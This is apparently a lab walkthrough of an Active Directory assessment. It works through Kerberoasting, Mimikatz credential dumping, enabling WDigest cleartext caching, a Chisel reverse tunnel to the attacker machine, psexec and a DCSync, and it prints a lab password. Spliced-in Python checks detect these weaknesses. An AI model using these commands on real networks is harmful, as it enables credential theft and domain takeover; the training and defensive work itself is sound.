AD Enumeration & Attacks - Skills Assessment Part I
We already have these credentials ('admin:My_W3bsH3ll_P@ssw0rd!') in place, which lets us start from the /uploads directory.
Questions and responses
1-Submit the contents of the flag.txt file on the administrator Desktop of the web server
First, I perform a simple enumeration by identifying users on the target host using the following command:
net user
Result:
Administrator DefaultAccount Guest
WDAGUtilityAccount
I also want to determine the hostname of the target machine:
PS> hostname
WEB-WIN01
Get information about the system and the domain name:
PS> systeminfo
Host Name: WEB-WIN01
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00430-10710-91142-AA408
Original Install Date: 3/30/2022, 2:27:04 AM
System Boot Time: 3/16/2024, 5:05:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,160 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,388 MB
Virtual Memory: In Use: 1,043 MB
Page File Location(s): C:\pagefile.sys
Domain: INLANEFREIGHT.LOCAL
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB4578966
[02]: KB4464455
Network Card(s): 2 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.197.134
[02]: fe80::4cec:af88:cdc7:54bd
[03]: dead:beef::4cec:af88:cdc7:54bd
[04]: dead:beef::1fe
[02]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet1
DHCP Enabled: No
IP address(es)
[01]: 172.16.6.100
[02]: fe80::adb5:8ffa:2424:3d64
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Get information about the domain controllers:
PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
Forest : INLANEFREIGHT.LOCAL
CurrentTime : 3/17/2024 2:20:08 AM
HighestCommittedUsn : 65655
OSVersion : Windows Server 2019 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : INLANEFREIGHT.LOCAL
IPAddress : 172.16.6.3
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : DC01.INLANEFREIGHT.LOCAL
Partitions : {DC=INLANEFREIGHT,DC=LOCAL, CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL...}
2-Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
So, first, we need to enumerate SPN accounts with the following command:
PS> setspn.exe -Q */*
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
DNS/DC01.INLANEFREIGHT.LOCAL
GC/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
RestrictedKrbHost/DC01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/DC01
RPC/03d2eace-bb3d-467e-a00a-eab0dbfaa065._msdcs.INLANEFREIGHT.LOCAL
HOST/DC01/INLANEFREIGHT
HOST/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
HOST/DC01
HOST/DC01.INLANEFREIGHT.LOCAL
HOST/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
E3514235-4B06-11D1-AB04-00C04FC2DCD2/03d2eace-bb3d-467e-a00a-eab0dbfaa065/INLANEFREIGHT.LOCAL
ldap/DC01/INLANEFREIGHT
ldap/03d2eace-bb3d-467e-a00a-eab0dbfaa065._msdcs.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
ldap/DC01
ldap/DC01.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
kadmin/changepw
CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/SQL01.inlanefreight.local:1433
CN=sqlprod,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/SQL02.inlanefreight.local:1433
CN=sqldev,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
CN=sqltest,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/DEVTEST.inlanefreight.local:1433
CN=sqlqa,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/QA001.inlanefreight.local:1433
CN=azureconnect,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
adfsconnect/azure01.inlanefreight.local
CN=backupjob,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
backupjob/veam001.inlanefreight.local
CN=WEB-WIN01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
RestrictedKrbHost/WEB-WIN01
HOST/WEB-WIN01
RestrictedKrbHost/WEB-WIN01.INLANEFREIGHT.LOCAL
HOST/WEB-WIN01.INLANEFREIGHT.LOCAL
CN=MS01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
tapinego/MS01
tapinego/MS01.INLANEFREIGHT.LOCAL
TERMSRV/MS01
TERMSRV/MS01.INLANEFREIGHT.LOCAL
WSMAN/MS01
WSMAN/MS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/MS01
HOST/MS01
RestrictedKrbHost/MS01.INLANEFREIGHT.LOCAL
HOST/MS01.INLANEFREIGHT.LOCAL
setspn.exe is a built-in Windows command-line tool.
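As an added defensive check (my own code, not part of the original writeup), the following Python parses the setspn output above and lists the user objects that carry an SPN, i.e. the accounts whose service tickets can be taken offline and that therefore need gMSA or long random passwords and AES-only encryption. The sample is a constructed subset of the listing above, and the rule "user objects sit under CN=Users" is an assumption that holds for this lab.

```python
# Constructed sample in the layout of `setspn -Q */*`, trimmed from the output above
# (real output indents SPNs with a tab; the flattened form above parses the same way).
SETSPN_OUTPUT = """\
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
\tHOST/DC01.INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
\tkadmin/changepw
CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
\tMSSQLSvc/SQL01.inlanefreight.local:1433
CN=sqlprod,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
\tMSSQLSvc/SQL02.inlanefreight.local:1433
CN=backupjob,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
\tbackupjob/veam001.inlanefreight.local
CN=WEB-WIN01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
\tHOST/WEB-WIN01.INLANEFREIGHT.LOCAL
"""

def parse_setspn(text):
    """Map each account DN to the SPNs registered on it."""
    accounts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Checking domain"):
            continue
        if line.upper().startswith("CN="):   # DN line: a new account
            current = line
            accounts[current] = []
        elif current is not None:            # SPN line belonging to that account
            accounts[current].append(line)
    return accounts

def account_name(dn):
    """Leading RDN value, e.g. 'svc_sql' from 'CN=svc_sql,CN=Users,...'."""
    return dn.split(",")[0].split("=", 1)[1]

def is_user_account(dn):
    """Lab assumption: user objects sit under CN=Users (computers and DCs do not);
    krbtgt is skipped since its SPN is not requestable as an ordinary service ticket."""
    return dn.split(",")[1].upper() == "CN=USERS" and account_name(dn).lower() != "krbtgt"

def kerberoastable_accounts(text):
    """{account: [SPNs]} for user objects with an SPN: their TGS tickets can be taken
    offline, so they belong on gMSA or long random passwords with AES-only encryption."""
    return {account_name(dn): spns for dn, spns in parse_setspn(text).items()
            if is_user_account(dn) and spns}
```

Running kerberoastable_accounts over the full listing above is the quickest way for a domain admin to see which service accounts to migrate first.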
Let's request a Kerberos service ticket for the SPN 'MSSQLSvc/SQL01.inlanefreight.local:1433':
Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/SQL01.inlanefreight.local:1433'
The service ticket is now cached in memory; you can confirm this with 'klist'. Next we need to extract it. I'll attempt to do so with Mimikatz using the following command:
c:\mimikatz.exe "kerberos::list /export" exit
And it didn't work, so I switched to Rubeus and it worked:
.\Rubeus.exe kerberoast /simple /outfile:hashes.txt
Get-Content hashes.txt
Now we need to crack the ticket using Hashcat (mode 13100, Kerberos 5 TGS-REP etype 23):
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400F, 2639/5342 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433@INLANEFREIGHT.LOCAL*$216c085da9fc106eae92301453a63062$9d816b1ef670f3ae7753d19ce01a433b28fc14c8d8a6e04daa102374a4###":####
Don't attempt to crack the other TGS tickets; it won't work xD.
4-Submit the contents of the flag.txt file on the Administrator desktop on MS01
I first use ping to check that MS01 is reachable and to determine its IP address:
PS> ping MS01
Pinging MS01.INLANEFREIGHT.LOCAL [172.16.6.50] with 32 bytes of data:
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.6.50:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Let's use the credentials of the SPN account we found.
Now let's use nc.exe on WEB-WIN01 to establish a stable shell, and I will use Chisel as a proxy on it to forward my requests into the domain's internal network from my Kali machine. You can achieve this with the following commands:
chisel server -p 8000 --reverse   # on the Kali side
c:\chisel.exe client 10.10.15.79:8001 R:socks   # on the target side
Then I use CrackMapExec with the credentials of the user 'svc_sql' against the IP address of MS01:
proxychains crackmapexec smb 172.16.6.50 -u "svc_sql" -p "#"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:135 ... OK
SMB 172.16.6.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
SMB 172.16.6.50 445 MS01 [+] INLANEFREIGHT.LOCAL\svc_sql:# (Pwn3d!)
So we confirm that the user is a local administrator on this machine ('Pwn3d!'), and we can proceed with psexec:
proxychains psexec.py INLANEFREIGHT.LOCAL/svc_sql:#@172.16.6.50
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[*] Requesting shares on 172.16.6.50.....
[*] Found writable share ADMIN$
[*] Uploading file esYPBcoJ.exe
[*] Opening SVCManager on 172.16.6.50.....
[*] Creating service YQPw on 172.16.6.50.....
[*] Starting service YQPw.....
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[!] Press help for extra shell commands
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
5-Find cleartext credentials for another domain user. Submit the username as your answer
Here, it took a lot of time because I didn't pay attention to something very important. I hope you'll discover it; if not, don't worry, I recommend you read this blog. First, I downloaded Mimikatz onto the target machine using Evil-WinRM and then ran it to dump any credentials in memory:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Let's take a look at the user we are interested in.
Authentication Id : 0 ; 229876 (00000000:000381f4)
Session : Interactive from 1
User Name : tpetty
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 3/17/2024 4:59:40 PM
SID : S-1-5-21-2270287766-1317258649-2146029398-4607
msv :
[00000003] Primary
* Username : tpetty
* Domain : INLANEFREIGHT
* NTLM : #
* SHA1 : 38afea42a5e28220474839558f073979645a1192
* DPAPI : da2ec07551ab1602b7468db08b41e3b2
tspkg :
wdigest :
* Username : tpetty
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : tpetty
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :
But I only found a blank password. So I extracted that user's Kerberos ticket and attempted to crack it, but it didn't work despite trying several methods. I even attempted to crack the NT hash, but that also failed. After further research, I discovered that I needed to enable "WDigest". For more details, check the post I mentioned. Here's the command:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
To confirm it is enabled, run:
C:\Mimikatz>reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
Debuglevel REG_DWORD 0x0
Negotiate REG_DWORD 0x0
UTF8HTTP REG_DWORD 0x1
UTF8SASL REG_DWORD 0x1
DigestEncryptionAlgorithms REG_SZ 3des,rc4
UseLogonCredential REG_DWORD 0x1
'UseLogonCredential REG_DWORD 0x1' must be set to 1, not 0. Even once it is enabled, the machine has to be restarted so that the user's next logon is cached in cleartext, using the following command:
shutdown /r /t 0 /f
After the reboot it works:
Authentication Id : 0 ; 166925 (00000000:00028c0d)
Session : Interactive from 1
User Name : tpetty
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 3/17/2024 5:34:30 PM
SID : S-1-5-21-2270287766-1317258649-2146029398-4607
msv :
[00000003] Primary
* Username : tpetty
* Domain : INLANEFREIGHT
* NTLM : #
* SHA1 : 38afea42a5e28220474839558f073979645a1192
* DPAPI : da2ec07551ab1602b7468db08b41e3b2
tspkg :
wdigest :
* Username : tpetty
* Domain : INLANEFREIGHT
* Password : ####
kerberos :
* Username : tpetty
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :
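As an added defensive check (my own code, not part of the original writeup), the following Python parses `reg query` output for the WDigest key shown above and reports whether UseLogonCredential is enabled, which is the setting that makes LSASS keep cleartext passwords. Both registry samples are constructed: the first mirrors the key above with the value set to 1, the second is a default Server 2019 key where the value is absent; the function names are my own.

```python
import re

# Constructed samples in the layout of `reg query` output: the first mirrors the key above
# with UseLogonCredential=1, the second a default Server 2019 key where the value is absent.
REG_WDIGEST_ENABLED = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
    Debuglevel    REG_DWORD    0x0
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UTF8SASL    REG_DWORD    0x1
    DigestEncryptionAlgorithms    REG_SZ    3des,rc4
    UseLogonCredential    REG_DWORD    0x1
"""
REG_WDIGEST_DEFAULT = "\n".join(REG_WDIGEST_ENABLED.splitlines()[:-1]) + "\n"

# name, type, data; `\s*` so the flattened (unindented) form above also parses
VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*)$")

def parse_reg_query(text):
    """{value name: data} from `reg query` output; REG_DWORD data becomes an int."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if not m:                     # key path line or blank line
            continue
        name, typ, data = m.groups()
        values[name] = int(data, 16) if typ == "REG_DWORD" else data.strip()
    return values

def wdigest_caches_cleartext(text):
    """True when UseLogonCredential is 1. Since KB2871997 (Windows 8.1 / Server 2012 R2 and
    later) the value is absent by default, which means WDigest keeps no cleartext in LSASS."""
    return parse_reg_query(text).get("UseLogonCredential", 0) == 1

def assess_wdigest(text):
    """One-line verdict a host audit script would emit for this key."""
    if wdigest_caches_cleartext(text):
        return ("RISK: UseLogonCredential=1, cleartext passwords of future logons will be "
                "cached in LSASS; set it to 0 and find out who changed it (Sysmon Event 13 / 4657)")
    return "OK: WDigest cleartext caching disabled (UseLogonCredential is 0 or absent)"
```

Someone setting this value on a server is a classic precursor to credential theft, so a change to it is worth alerting on rather than only auditing periodically.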
6-What attack can this user perform?
I'm now attempting to use BloodHound. First I downloaded SharpHound onto MS01 using Evil-WinRM, and then executed it with the following command:
SharpHound.exe -c ALL --zipfilename enum
And then I extracted the zip file on my Kali machine and used the BloodHound GUI. Here's what I found:

So the answer is DCSync.
7-Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
So our compromised user 'tpetty' can perform DCSync against the domain controller. Now we just need the IP address of the DC, which we gathered earlier (172.16.6.3). In my case I attempted to do this using Mimikatz, but first I needed to authenticate as that user:
runas /netonly /user:INLANEFREIGHT\tpetty powershell
It did not work for me, so I quickly switched to my Kali Linux machine and performed the attack using secretsdump.py:
proxychains secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/tpetty:#@172.16.6.3
This gave me the Administrator's hash, which I used to confirm I could authenticate to DC01 with CrackMapExec:
proxychains crackmapexec smb 172.16.6.3 -u "Administrator" -H #
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:135 ... OK
SMB 172.16.6.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
SMB 172.16.6.3 445 DC01 [+] INLANEFREIGHT.LOCAL\Administrator:#(Pwn3d!)
Then we use psexec directly with the Administrator hash to get the flag.